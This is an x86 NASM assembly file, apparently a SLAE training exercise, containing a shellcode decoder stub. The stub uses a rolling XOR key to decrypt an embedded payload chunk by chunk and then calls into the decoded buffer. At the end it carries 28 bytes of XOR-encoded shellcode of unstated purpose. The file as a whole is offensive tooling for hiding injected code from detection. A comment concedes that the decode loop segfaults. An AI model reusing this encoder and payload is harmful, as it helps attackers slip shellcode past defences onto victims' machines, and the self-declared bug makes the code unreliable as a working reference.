
; Filename: Decoder.nasm
; Author:  SLAE-935
;
; Purpose: decode bytecode in chunks of 8 bytes preserving the status

global _start			

section .text

_start:

    mov ebx, 0xfdb6e7fb ; initial encrypt key
    push ebx
    xor edx,edx ; i = 0
    push edx
    pop edx ; begin for loop
    pop ebx
    jmp short call_get_pc ; getPC
get_pc:
    pop edi ; edi=buff addr
    xor ecx,ecx
    cmp edx,ecx
copy_init:
    jz decode_init ; skip copy if i==0
    xor ecx,ecx
    mov cl, 0xc ; words to copy
    push ebx
    push edx
    mov esi,edx
    imul esi,ecx
    shl esi,0x2
    add esi,edi ; esi=edi+(i*ecx*4)
copy_loop:
    mov ebx,ecx ; copy loop
    sub bl,0x1
    shl ebx,0x2 ; ebx=(ecx-1)*4
    mov edx,[esi+ebx] ; tmp=src
    mov [edi+ebx],edx ; dst=tmp
    loop copy_loop
    pop edx ; edx=i
    pop ebx ; ebx=key
decode_init:
    xor ecx, ecx
    mov cl, 0xc ; words to decode
decode_loop:
    xor [ edi + ecx * 4 - 0x4 ], ebx ; decode loop TODO: Fix Sigsev signal (probably a protected or RO area is accessed)
    loop decode_loop
    add ebx, [ edi ] ; modify key
    push ebx ; store for next loop
    inc edx ; i++
    push edx ; store for next loop
    call EncodedShellcode ; call decoded buffer
call_get_pc:
    call get_pc

; Sample without Encryption
; EncodedShellcode: db 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
; Encoded shellcode with Xor
EncodedShellcode: db 0xca,0x27,0xe6,0x95,0xd4,0xc8,0xc5,0x95,0x93,0xc8,0xd4,0x94,0x95,0x6e,0x55,0xad,0x72,0x05,0xe5,0x74,0x1a,0x57,0xbd,0x30,0x7b,0x77,0x26,0x6d